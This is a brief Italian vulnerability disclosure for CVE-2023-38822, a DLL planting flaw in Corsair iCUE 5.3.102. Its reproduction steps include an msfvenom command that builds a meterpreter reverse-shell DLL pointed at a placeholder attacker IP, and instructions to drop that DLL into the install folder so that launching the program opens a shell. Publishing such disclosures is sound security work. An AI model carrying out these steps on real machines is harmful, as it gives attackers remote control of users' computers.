Corsair---DLL-Planting-CVE-2023-38822
DLL Planting in Corsair iCUE v.5.3.102 CVE-2023-38822
Scopritore: Idan Malihi
Descrizione
Un problema in Corsair iCUE v.5.3.102 consente a un attaccante locale di eseguire
codice arbitrario tramite i componenti MPDC.dll, CRYPTSP.dll, dcomp.dll, profapi.dll e MSASN1.dll.
Passi per la Riproduzione
Per sfruttare la vulnerabilità di DLL Planting, un attaccante dovrebbe seguire i seguenti passi:
- Scarica l'ultima versione di iCUE.
- Installa il prodotto iCUE.
- Apri la cartella del percorso di installazione, ad esempio C:\Program Files\Corsair\Corsair iCUE5 Software\
- Crea un file dll dannoso con msfvenom su Kali Linux:
msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
- Trasferisci il file DLL al percorso del gioco C:\Program Files\Corsair\Corsair iCUE5 Software\
- Esegui iCUE.exe e ottieni una reverse shell.